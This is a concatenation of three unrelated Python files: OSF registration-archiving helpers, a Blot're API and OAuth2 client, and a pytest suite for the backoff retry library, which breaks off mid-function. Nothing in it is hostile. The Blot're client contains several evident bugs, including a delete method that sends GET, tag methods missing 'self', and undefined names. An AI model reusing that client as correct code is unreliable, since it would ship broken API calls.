dst.root.sanction.save()
dst.root.delete_registration_tree(save=True)
def archive_provider_for(node, user):
"""A generic function to get the archive provider for some node, user pair.
:param node: target node
:param user: target user (currently unused, but left in for future-proofing
the code for use with archive providers other than OSF Storage)
"""
return node.get_addon(settings.ARCHIVE_PROVIDER)
def has_archive_provider(node, user):
"""A generic function for checking whether or not some node, user pair has
an attached provider for archiving
:param node: target node
:param user: target user (currently unused, but left in for future-proofing
the code for use with archive providers other than OSF Storage)
"""
return node.has_addon(settings.ARCHIVE_PROVIDER)
def link_archive_provider(node, user):
"""A generic function for linking some node, user pair with the configured
archive provider
:param node: target node
:param user: target user (currently unused, but left in for future-proofing
the code for use with archive providers other than OSF Storage)
"""
addon = node.get_or_add_addon(settings.ARCHIVE_PROVIDER, auth=Auth(user), log=False)
if hasattr(addon, 'on_add'):
addon.on_add()
node.save()
def aggregate_file_tree_metadata(addon_short_name, fileobj_metadata, user):
"""Recursively traverse the addon's file tree and collect metadata in AggregateStatResult
:param src_addon: AddonNodeSettings instance of addon being examined
:param fileobj_metadata: file or folder metadata of current point of reference
in file tree
:param user: archive initatior
:return: top-most recursive call returns AggregateStatResult containing addon file tree metadata
"""
disk_usage = fileobj_metadata.get('size')
if fileobj_metadata['kind'] == 'file':
result = StatResult(
target_name=fileobj_metadata['name'],
target_id=fileobj_metadata['path'].lstrip('/'),
disk_usage=disk_usage or 0,
)
return result
else:
return AggregateStatResult(
target_id=fileobj_metadata['path'].lstrip('/'),
target_name=fileobj_metadata['name'],
targets=[aggregate_file_tree_metadata(addon_short_name, child, user) for child in fileobj_metadata.get('children', [])],
)
def before_archive(node, user):
from osf.models import ArchiveJob
link_archive_provider(node, user)
job = ArchiveJob.objects.create(
src_node=node.registered_from,
dst_node=node,
initiator=user
)
job.set_targets()
def _do_get_file_map(file_tree):
"""Reduces a tree of folders and files into a list of (<sha256>, <file_metadata>) pairs
"""
file_map = []
stack = [file_tree]
while len(stack):
tree_node = stack.pop(0)
if tree_node['kind'] == 'file':
file_map.append((tree_node['extra']['hashes']['sha256'], tree_node))
else:
stack = stack + tree_node['children']
return file_map
def _memoize_get_file_map(func):
cache = {}
@functools.wraps(func)
def wrapper(node):
from osf.models import OSFUser
if node._id not in cache:
osf_storage = node.get_addon('osfstorage')
file_tree = osf_storage._get_file_tree(user=OSFUser.load(list(node.admin_contributor_or_group_member_ids)[0]))
cache[node._id] = _do_get_file_map(file_tree)
return func(node, cache[node._id])
return wrapper
@_memoize_get_file_map
def get_file_map(node, file_map):
"""
note:: file_map is injected implictly by the decorator; this method is called like:
get_file_map(node)
"""
for (key, value) in file_map:
yield (key, value, node._id)
for child in node.nodes_primary:
for key, value, node_id in get_file_map(child):
yield (key, value, node_id)
def find_registration_file(value, node):
"""
some annotations:
- `value` is the `extra` from a file upload in `registered_meta`
(see `Uploader.addFile` in website/static/js/registrationEditorExtensions.js)
- `node` is a Registration instance
- returns a `(file_info, node_id)` or `(None, None)` tuple, where `file_info` is from waterbutler's api
(see `addons.base.models.BaseStorageAddon._get_fileobj_child_metadata` and `waterbutler.core.metadata.BaseMetadata`)
"""
from osf.models import AbstractNode
orig_sha256 = value['sha256']
orig_name = unescape_entities(
value['selectedFileName'],
safe={
'<': '<',
'>': '>'
}
)
orig_node = value['nodeId']
file_map = get_file_map(node)
for sha256, file_info, node_id in file_map:
registered_from_id = AbstractNode.load(node_id).registered_from._id
if sha256 == orig_sha256 and registered_from_id == orig_node and orig_name == file_info['name']:
return file_info, node_id
return None, None
def find_registration_files(values, node):
"""
some annotations:
- `values` is from `registered_meta`, e.g. `{ comments: [], value: '', extra: [] }`
- `node` is a Registration model instance
- returns a list of `(file_info, node_id, index)` or `(None, None, index)` tuples,
where `file_info` is from `find_registration_file` above
"""
ret = []
for i in range(len(values.get('extra', []))):
ret.append(find_registration_file(values['extra'][i], node) + (i,))
return ret
def get_title_for_question(schema, path):
path = path.split('.')
root = path.pop(0)
item = None
for page in schema['pages']:
questions = {
q['qid']: q
for q in page['questions']
}
if root in questions:
item = questions[root]
title = item.get('title')
while len(path):
item = item.get(path.pop(0), {})
title = item.get('title', title)
return title
def find_selected_files(schema, metadata):
"""
some annotations:
- `schema` is a RegistrationSchema instance
- `metadata` is from `registered_meta` (for the given schema)
- returns a dict that maps from each `osf-upload` question id (`.`-delimited path) to its chunk of metadata,
e.g. `{ 'q1.uploader': { comments: [], extra: [...], value: 'foo.pdf' } }`
"""
targets = []
paths = [('', p) for p in schema.schema['pages']]
while len(paths):
prefix, path = paths.pop(0)
if path.get('questions'):
paths = paths + [('', q) for q in path['questions']]
elif path.get('type'):
qid = path.get('qid', path.get('id'))
if path['type'] == 'object':
paths = paths + [('{}.{}.value'.format(prefix, qid), p) for p in path['properties']]
elif path['type'] == 'osf-upload':
targets.append('{}.{}'.format(prefix, qid).lstrip('.'))
selected = {}
for t in targets:
parts = t.split('.')
value = metadata.get(parts.pop(0))
while value and len(parts):
value = value.get(parts.pop(0))
if value:
selected[t] = value
return selected
VIEW_FILE_URL_TEMPLATE = '/project/{node_id}/files/osfstorage/{file_id}/'
def deep_get(obj, path):
parts = path.split('.')
item = obj
key = None
while len(parts):
key = parts.pop(0)
item[key] = item.get(key, {})
item = item[key]
return item
def migrate_file_metadata(dst, schema):
metadata = dst.registered_meta[schema._id]
missing_files = []
selected_files = find_selected_files(schema, metadata)
for path, selected in selected_files.items():
target = deep_get(metadata, path)
for archived_file_info, node_id, index in find_registration_files(selected, dst):
if not archived_file_info:
missing_files.append({
'file_name': selected['extra'][index]['selectedFileName'],
'question_title': get_title_for_question(schema.schema, path)
})
continue
archived_file_id = archived_file_info['path'].lstrip('/')
target['extra'][index]['viewUrl'] = VIEW_FILE_URL_TEMPLATE.format(node_id=node_id, file_id=archived_file_id)
if missing_files:
from website.archiver.tasks import ArchivedFileNotFound
raise ArchivedFileNotFound(
registration=dst,
missing_files=missing_files
)
dst.registered_meta[schema._id] = metadata
dst.registration_responses = dst.flatten_registration_metadata()
dst.save()
|
|
import json
import os
import re
import requests
try:
from urllib import urlencode
from urlparse import urlunparse
except ImportError:
from urllib.parse import urlencode
from urllib.parse import urlunparse
_JSON_HEADERS = {
'accepts': 'application/json',
'content-type': 'application/json'
}
ROOT = '/v0/'
API_ROOT = ROOT + 'api/'
OAUTH2_ROOT = ROOT + 'oauth2/'
DEFAULT_CONFIG = {
'protocol': 'https',
'host': 'blot.re',
}
def _extend(dict1, dict2):
extended = dict1.copy()
extended.update(dict2)
return extended
class TokenEndpointError(Exception):
"""
Error communicating with the token endpoint.
"""
def __init__(self, error, error_description):
self.error = error
self.error_description = error_description
super(TokenEndpointError, self).__init__(
"[%s] %s" % (self.error, self.error_description))
def _token_error_from_data(data):
return TokenEndpointError(
data.get('error', ''),
data.get('error_description', ''))
class RestError(Exception):
"""
Error response from one of the REST APIS.
"""
def __init__(self, status_code, error_description, details):
self.status_code = status_code
self.error_description = error_description
self.details = details
super(RestError, self).__init__(
"[%s] %s" % (self.status_code, self.error_description))
def _is_error_response(body):
return body.get('type', '') == 'Error' or 'error' in body
def _rest_error_from_response(response):
body = response.json()
return RestError(
response.status_code,
body['error'],
body.get('details', None))
def _format_url(config, relPath, query={}):
return urlunparse((
config.get('protocol'),
config.get('host'),
relPath,
'',
urlencode(query),
''))
class Blotre:
"""
Main Blot're flow object.
"""
def __init__(self, client, creds={}, config={}):
self.client = client
self.config = _extend(DEFAULT_CONFIG, config)
self.creds = creds
def set_creds(self, newCreds):
"""Manually update the current creds."""
self.creds = newCreds
self.on_creds_changed(newCreds)
return self
def on_creds_changed(self, newCreds):
"""
Overridable function called when the creds change
"""
pass
def normalize_uri(self, uri):
"""Convert a stream path into it's normalized form."""
return urllib.quote(
re.sub(r"\s", '+', uri.strip().lower()),
safe = '~@#$&()*!+=:),.?/\'')
def join_uri(self, *paths):
return '/'.join(self.normalize_uri(x) for x in paths)
def _get_websocket_protocol(self):
return 'ws' if self.config.protocol == 'http' else 'wss'
def get_websocket_url(self):
"""
Get the url for using the websocked APIs,
used for both subscription and send/receive.
"""
return self._get_websocket_protocol() + '://' + config.host + '/v0/ws'
def _format_url(self, relPath, query={}):
return _format_url(self.config, relPath, query)
# Authorization
def get_authorization_url(self):
"""Get the authorization Url for the current client."""
return self._format_url(
OAUTH2_ROOT + 'authorize',
query = {
'response_type': 'code',
'client_id': self.client.get('client_id', ''),
'redirect_uri': self.client.get('redirect_uri', '')
})
def get_redeem_url(self):
"""
Get the Url where a user can redeem a onetime code
for a disposable client.
"""
return self._format_url(OAUTH2_ROOT + 'redeem')
def _access_token_endpoint(self, grantType, extraParams={}):
"""
Base exchange of data for an access_token.
"""
response = requests.post(
self._format_url(OAUTH2_ROOT + 'access_token'),
data = _extend({
'grant_type': grantType,
'client_id': self.client.get('client_id', ''),
'client_secret': self.client.get('client_secret', ''),
'redirect_uri': self.client.get('redirect_uri', '')
}, extraParams))
data = response.json()
if 'error' in data or 'error_description' in data:
raise _token_error_from_data(data)
else:
return self.set_creds(data)
def redeem_authorization_code(self, code):
"""
Exchange an authorization code for a new access token.
If successful, update client to use these credentials.
"""
return self._access_token_endpoint('authorization_code', {
'code': code
})
def exchange_refresh_token(self):
"""
Attempt to exchange a refresh token for a new access token.
If successful, update client to use these credentials.
"""
return self._access_token_endpoint('refresh_token', {
'refresh_token': self.creds['refresh_token']
})
def redeem_onetime_code(self, code):
"""
Attempt to exchange a onetime token for a new access token.
If successful, update client to use these credentials.
"""
return self._access_token_endpoint(
'https://oauth2grant.blot.re/onetime_code', {
'code': code if code else self.client['code']
})
def get_token_info(self):
"""
Get information about the current access token.
"""
response = requests.get(
self._format_url(OAUTH2_ROOT + 'token_info', {
'token': self.creds['access_token']
}))
data = response.json()
if response.status_code != 200:
raise _token_error_from_data(data)
else:
return data
# Requests
def _add_auth_headers(self, base):
"""Attach the acces_token to a request."""
if 'access_token' in self.creds:
return _extend(base, {
'authorization': 'Bearer ' + self.creds['access_token']
})
return base
def _is_expired_response(self, response):
"""
Check if the response failed because of an expired access token.
"""
if response.status_code != 401:
return False
challenge = response.headers.get('www-authenticate', '')
return 'error="invalid_token"' in challenge
def _make_request(self, type, path, args, noRetry=False):
"""
Make a request to Blot're.
Attempts to reply the request if it fails due to an expired
access token.
"""
response = getattr(requests, type)(path, headers = self._add_auth_headers(_JSON_HEADERS), **args)
if response.status_code == 200 or response.status_code == 201:
return response.json()
elif not noRetry and self._is_expired_response(response) \
and 'refresh_token' in self.creds:
try:
self.exchange_refresh_token()
except TokenEndpointError:
raise _rest_error_from_response(response)
return self._make_request(type, path, args, noRetry = True)
raise _rest_error_from_response(response)
def get(self, path, query={}):
"""GET request."""
return self._make_request('get',
self._format_url(API_ROOT + path, query=query), {})
def post(self, path, body):
"""POST request."""
return self._make_request('post',
self._format_url(API_ROOT + path), {
'json': body
})
def put(self, path, body):
"""PUT request."""
return self._make_request('put',
self._format_url(API_ROOT + path), {
'json': body
})
def delete(self, path):
"""DELETE request."""
return self._make_request('get',
self._format_url(API_ROOT + path), {})
# User Operations
def get_user(self, userId, options={}):
"""Get a user by id."""
return self.get('user/' + userId, options)
# Stream Operations
def get_streams(self, options={}):
"""Stream lookup."""
return self.get('stream', options)
def create_stream(self, body):
"""Create a new stream."""
return self.put('stream', body)
def get_stream(self, id, options={}):
"""Get a stream."""
return self.get('stream/' + id, options)
def delete_stream(self, id):
"""Delete an existing stream."""
return self.delete('stream', id)
def get_stream_status(self, id, options={}):
"""Get the status of a stream."""
return self.get('stream/' + id, options)
def set_stream_status(self, id, body):
"""Update the status of a stream."""
return self.post('stream/' + id + '/status', body)
def get_stream_children(self, id, options={}):
"""Get the children of a stream."""
return self.get('stream/' + id + '/children', options)
def get_child(self, streamId, childId, options={}):
"""Get the child of a stream."""
return self.get('stream/' + streamId + '/children/' + childId, options)
def create_child(self, streamId, childId):
"""Add a new child to a stream."""
return self.put('stream/' + streamId + '/children/' + childId)
def delete_child(self, streamId, childId):
"""Remove a child from a stream."""
return self.delete('stream/' + streamId + '/children/' + childId)
def get_tags(streamId):
"""Get the tags of a stream."""
self.get('stream/' + streamId + '/tags')
def set_tags(streamId):
"""Set the tags of a stream."""
self.post('stream/' + streamId + '/tags')
def get_tag(streamId, tag):
"""Get a tag on a stream."""
self.get('stream/' + streamId + '/tags/' + tag)
def set_tag(streamId, tag):
"""Create a tag on a stream."""
self.put('stream/' + streamId + '/tags/' + tag)
def delete_tag(streamId, tag):
"""Remove a tag on a stream."""
self.delete('stream/' + streamId + '/tags/' + tag)
# Basic Disposable Client
def create_disposable(clientInfo, config = {}):
"""
Create a new disposable client.
"""
response = requests.put(
_format_url(
_extend(DEFAULT_CONFIG, config),
OAUTH2_ROOT + 'disposable'),
json = clientInfo)
if response.status_code != 200:
return None
else:
body = response.json()
return Blotre({
'client_id': body['id'],
'client_secret': body['secret'],
'code': body['code']
}, config = config)
# Disposable App
class _BlotreDisposableApp(Blotre):
def __init__(self, file, client, **kwargs):
Blotre.__init__(self, client, **kwargs)
self.file = file
self._persist()
def on_creds_changed(self, newCreds):
self._persist()
def _persist(self):
"""Persist client data."""
with open(self.file, 'w') as f:
json.dump({
'client': self.client,
'creds': self.creds,
'config': self.config
}, f)
def _get_disposable_app_filename(clientInfo):
"""
Get name of file used to store creds.
"""
return clientInfo.get('file', clientInfo['name'] + '.client_data.json')
def _get_existing_disposable_app(file, clientInfo, conf):
"""
Attempt to load an existing
"""
if not os.path.isfile(file):
return None
else:
data = None
with open(file, 'r') as f:
data = json.load(f)
if not 'client' in data or not 'creds' in data:
return None
return _BlotreDisposableApp(file,
data['client'],
creds = data['creds'],
config = conf)
def _try_redeem_disposable_app(file, client):
"""
Attempt to redeem a one time code registred on the client.
"""
redeemedClient = client.redeem_onetime_code(None)
if redeemedClient is None:
return None
else:
return _BlotreDisposableApp(file,
redeemedClient.client,
creds = redeemedClient.creds,
config = redeemedClient.config)
def _create_new_disposable_app(file, clientInfo, config):
client = create_disposable(clientInfo, config = config)
if client is None:
return None
code = client.client['code']
userInput = raw_input("Please redeem disposable code: " + code + '\n')
return _try_redeem_disposable_app(file, client)
def _check_app_is_valid(client):
"""
Check to see if the app has valid creds.
"""
try:
if 'refresh_token' in client.creds:
client.exchange_refresh_token()
else:
existing.get_token_info()
return True
except TokenEndpointError as e:
return False
def create_disposable_app(clientInfo, config={}):
"""
Use an existing disposable app if data exists or create a new one
and persist the data.
"""
file = _get_disposable_app_filename(clientInfo)
existing = _get_existing_disposable_app(file, clientInfo, config)
if existing:
if _check_app_is_valid(existing):
return existing
else:
print("Existing client has expired, must recreate.")
return _create_new_disposable_app(file, clientInfo, config)
|
|
# coding:utf-8
import datetime
import itertools
import logging
import random
import re
import sys
import threading
import unittest.mock
import pytest
import backoff
from tests.common import _save_target
def test_on_predicate(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
@backoff.on_predicate(backoff.expo)
def return_true(log, n):
val = (len(log) == n - 1)
log.append(val)
return val
log = []
ret = return_true(log, 3)
assert ret is True
assert 3 == len(log)
def test_on_predicate_max_tries(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
@backoff.on_predicate(backoff.expo, jitter=None, max_tries=3)
def return_true(log, n):
val = (len(log) == n)
log.append(val)
return val
log = []
ret = return_true(log, 10)
assert ret is False
assert 3 == len(log)
def test_on_predicate_max_time(monkeypatch):
nows = [
datetime.datetime(2018, 1, 1, 12, 0, 10, 5),
datetime.datetime(2018, 1, 1, 12, 0, 9, 0),
datetime.datetime(2018, 1, 1, 12, 0, 1, 0),
datetime.datetime(2018, 1, 1, 12, 0, 0, 0),
]
class Datetime:
@staticmethod
def now():
return nows.pop()
monkeypatch.setattr('time.sleep', lambda x: None)
monkeypatch.setattr('datetime.datetime', Datetime)
def giveup(details):
assert details['tries'] == 3
assert details['elapsed'] == 10.000005
@backoff.on_predicate(backoff.expo, jitter=None, max_time=10,
on_giveup=giveup)
def return_true(log, n):
val = (len(log) == n)
log.append(val)
return val
log = []
ret = return_true(log, 10)
assert ret is False
assert len(log) == 3
def test_on_exception(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
@backoff.on_exception(backoff.expo, KeyError)
def keyerror_then_true(log, n):
if len(log) == n:
return True
e = KeyError()
log.append(e)
raise e
log = []
assert keyerror_then_true(log, 3) is True
assert 3 == len(log)
def test_on_exception_tuple(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
@backoff.on_exception(backoff.expo, (KeyError, ValueError))
def keyerror_valueerror_then_true(log):
if len(log) == 2:
return True
if len(log) == 0:
e = KeyError()
if len(log) == 1:
e = ValueError()
log.append(e)
raise e
log = []
assert keyerror_valueerror_then_true(log) is True
assert 2 == len(log)
assert isinstance(log[0], KeyError)
assert isinstance(log[1], ValueError)
def test_on_exception_max_tries(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
@backoff.on_exception(backoff.expo, KeyError, jitter=None, max_tries=3)
def keyerror_then_true(log, n, foo=None):
if len(log) == n:
return True
e = KeyError()
log.append(e)
raise e
log = []
with pytest.raises(KeyError):
keyerror_then_true(log, 10, foo="bar")
assert 3 == len(log)
def test_on_exception_constant_iterable(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
backoffs = []
giveups = []
successes = []
@backoff.on_exception(
backoff.constant,
KeyError,
interval=(1, 2, 3),
on_backoff=backoffs.append,
on_giveup=giveups.append,
on_success=successes.append,
)
def endless_exceptions():
raise KeyError('foo')
with pytest.raises(KeyError):
endless_exceptions()
assert len(backoffs) == 3
assert len(giveups) == 1
assert len(successes) == 0
def test_on_exception_success_random_jitter(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
backoffs, giveups, successes = [], [], []
@backoff.on_exception(backoff.expo,
Exception,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=backoff.random_jitter,
factor=0.5)
@_save_target
def succeeder(*args, **kwargs):
# succeed after we've backed off twice
if len(backoffs) < 2:
raise ValueError("catch me")
succeeder(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
assert details['wait'] >= 0.5 * 2 ** i
def test_on_exception_success_full_jitter(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
backoffs, giveups, successes = [], [], []
@backoff.on_exception(backoff.expo,
Exception,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=backoff.full_jitter,
factor=0.5)
@_save_target
def succeeder(*args, **kwargs):
# succeed after we've backed off twice
if len(backoffs) < 2:
raise ValueError("catch me")
succeeder(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
assert details['wait'] <= 0.5 * 2 ** i
def test_on_exception_success():
backoffs, giveups, successes = [], [], []
@backoff.on_exception(backoff.constant,
Exception,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=None,
interval=0)
@_save_target
def succeeder(*args, **kwargs):
# succeed after we've backed off twice
if len(backoffs) < 2:
raise ValueError("catch me")
succeeder(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': succeeder._target,
'tries': i + 1,
'wait': 0}
details = successes[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': succeeder._target,
'tries': 3}
@pytest.mark.parametrize('raise_on_giveup', [True, False])
def test_on_exception_giveup(raise_on_giveup):
backoffs, giveups, successes = [], [], []
@backoff.on_exception(backoff.constant,
ValueError,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
max_tries=3,
jitter=None,
raise_on_giveup=raise_on_giveup,
interval=0)
@_save_target
def exceptor(*args, **kwargs):
raise ValueError("catch me")
if raise_on_giveup:
with pytest.raises(ValueError):
exceptor(1, 2, 3, foo=1, bar=2)
else:
exceptor(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice and giving up once
assert len(successes) == 0
assert len(backoffs) == 2
assert len(giveups) == 1
details = giveups[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': exceptor._target,
'tries': 3}
def test_on_exception_giveup_predicate(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
def on_baz(e):
return str(e) == "baz"
vals = ["baz", "bar", "foo"]
@backoff.on_exception(backoff.constant,
ValueError,
giveup=on_baz)
def foo_bar_baz():
raise ValueError(vals.pop())
with pytest.raises(ValueError):
foo_bar_baz()
assert not vals
def test_on_predicate_success():
backoffs, giveups, successes = [], [], []
@backoff.on_predicate(backoff.constant,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=None,
interval=0)
@_save_target
def success(*args, **kwargs):
# succeed after we've backed off twice
return len(backoffs) == 2
success(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': success._target,
'tries': i + 1,
'value': False,
'wait': 0}
details = successes[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': success._target,
'tries': 3,
'value': True}
def test_on_predicate_giveup():
backoffs, giveups, successes = [], [], []
@backoff.on_predicate(backoff.constant,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
max_tries=3,
jitter=None,
interval=0)
@_save_target
def emptiness(*args, **kwargs):
pass
emptiness(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice and giving up once
assert len(successes) == 0
assert len(backoffs) == 2
assert len(giveups) == 1
details = giveups[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': emptiness._target,
'tries': 3,
'value': None}
def test_on_predicate_iterable_handlers():
class Logger:
def __init__(self):
self.backoffs = []
self.giveups = []
self.successes = []
loggers = [Logger() for _ in range(3)]
@backoff.on_predicate(backoff.constant,
on_backoff=(l.backoffs.append for l in loggers),
on_giveup=(l.giveups.append for l in loggers),
on_success=(l.successes.append for l in loggers),
max_tries=3,
jitter=None,
interval=0)
@_save_target
def emptiness(*args, **kwargs):
pass
emptiness(1, 2, 3, foo=1, bar=2)
for logger in loggers:
assert len(logger.successes) == 0
assert len(logger.backoffs) == 2
assert len(logger.giveups) == 1
details = dict(logger.giveups[0])
print(details)
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': emptiness._target,
'tries': 3,
'value': None}
# To maintain backward compatibility,
# on_predicate should support 0-argument jitter function.
def test_on_exception_success_0_arg_jitter(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
monkeypatch.setattr('random.random', lambda: 0)
backoffs, giveups, successes = [], [], []
@backoff.on_exception(backoff.constant,
Exception,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=random.random,
interval=0)
@_save_target
def succeeder(*args, **kwargs):
# succeed after we've backed off twice
if len(backoffs) < 2:
raise ValueError("catch me")
with pytest.deprecated_call():
succeeder(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': succeeder._target,
'tries': i + 1,
'wait': 0}
details = successes[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': succeeder._target,
'tries': 3}
# To maintain backward compatibility,
# on_predicate should support 0-argument jitter function.
def test_on_predicate_success_0_arg_jitter(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
monkeypatch.setattr('random.random', lambda: 0)
backoffs, giveups, successes = [], [], []
@backoff.on_predicate(backoff.constant,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=random.random,
interval=0)
@_save_target
def success(*args, **kwargs):
# succeed after we've backed off twice
return len(backoffs) == 2
with pytest.deprecated_call():
success(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
print(details)
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': success._target,
'tries': i + 1,
'value': False,
'wait': 0}
details = successes[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': success._target,
'tries': 3,
'value': True}
def test_on_exception_callable_max_tries(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
def lookup_max_tries():
return 3
log = []
@backoff.on_exception(backoff.constant,
ValueError,
max_tries=lookup_max_tries)
def exceptor():
log.append(True)
raise ValueError()
with pytest.raises(ValueError):
exceptor()
assert len(log) == 3
def test_on_exception_callable_gen_kwargs():
def lookup_foo():
return "foo"
def wait_gen(foo=None, bar=None):
assert foo == "foo"
assert bar == "bar"
while True:
yield 0
@backoff.on_exception(wait_gen,
ValueError,
max_tries=2,
foo=lookup_foo,
bar="bar")
def exceptor():
raise ValueError("aah")
with pytest.raises(ValueError):
exceptor()
def test_on_predicate_in_thread(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
result = []
def check():
try:
@backoff.on_predicate(backoff.expo)
def return_true(log, n):
val = (len(log) == n - 1)
log.append(val)
return val
log = []
ret = return_true(log, 3)
assert ret is True
assert 3 == len(log)
except Exception as ex:
result.append(ex)
else:
result.append('success')
t = threading.Thread(target=check)
t.start()
t.join()
assert len(result) == 1
assert result[0] == 'success'
def test_on_predicate_constant_iterable(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
waits = [1, 2, 3, 6, 9]
backoffs = []
giveups = []
successes = []
@backoff.on_predicate(
backoff.constant,
interval=waits,
on_backoff=backoffs.append,
on_giveup=giveups.append,
on_success=successes.append,
jitter=None,
)
def falsey():
return False
assert not falsey()
assert len(backoffs) == len(waits)
for i, wait in enumerate(waits):
assert backoffs[i]['wait'] == wait
assert len(giveups) == 1
assert len(successes) == 0
def test_on_exception_in_thread(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
result = []
def check():
try:
@backoff.on_exception(backoff.expo, KeyError)
def keyerror_then_true(log, n):
if len(log) == n:
return True
e = KeyError()
log.append(e)
raise e
log = []
assert keyerror_then_true(log, 3) is True
assert 3 == len(log)
except Exception as ex:
result.append(ex)
else:
result.append('success')
t = threading.Thread(target=check)
t.start()
t.join()
assert len(result) == 1
assert result[0] == 'success'
def test_on_exception_logger_default(monkeypatch, caplog):
monkeypatch.setattr('time.sleep', lambda x: None)
logger = logging.getLogger('backoff')
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
@backoff.on_exception(backoff.expo, KeyError, max_tries=3)
def key_error():
raise KeyError()
with caplog.at_level(logging.INFO):
with pytest.raises(KeyError):
key_error()
assert len(caplog.records) == 3 # 2 backoffs and 1 giveup
for record in caplog.records:
assert record.name == 'backoff'
def test_on_exception_logger_none(monkeypatch, caplog):
monkeypatch.setattr('time.sleep', lambda x: None)
logger = logging.getLogger('backoff')
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
@backoff.on_exception(backoff.expo, KeyError, max_tries=3, logger=None)
def key_error():
raise KeyError()
with caplog.at_level(logging.INFO):
with pytest.raises(KeyError):
key_error()
assert not caplog.records
def test_on_exception_logger_user(monkeypatch, caplog):
monkeypatch.setattr('time.sleep', lambda x: None)
logger = logging.getLogger('my-logger')
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
@backoff.on_exception(backoff.expo, KeyError, max_tries=3, logger=logger)
def key_error():
raise KeyError()
with caplog.at_level(logging.INFO):
with pytest.raises(KeyError):
key_error()
assert len(caplog.records) == 3 # 2 backoffs and 1 giveup
for record in caplog.records:
assert record.name == 'my-logger'
def test_on_exception_logger_user_str(monkeypatch, caplog):
monkeypatch.setattr('time.sleep', lambda x: None)
logger = logging.getLogger('my-logger')
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
@backoff.on_exception(backoff.expo, KeyError, max_tries=3,
logger='my-logger')
def key_error():
raise KeyError()
with caplog.at_level(logging.INFO):
with pytest.raises(KeyError):
key_error()
assert len(caplog.records) == 3 # 2 backoffs and 1 giveup
for record in caplog.records:
assert record.name == 'my-logger'
def _on_exception_factory(
backoff_log_level, giveup_log_level, max_tries
):
@backoff.on_exception(
backoff.expo,
ValueError,
max_tries=max_tries,
backoff_log_level=backoff_log_level,
giveup_log_level=giveup_log_level,
)
def value_error():
raise ValueError
def func():
with pytest.raises(ValueError):
value_error()
return func
def _on_predicate_factory(
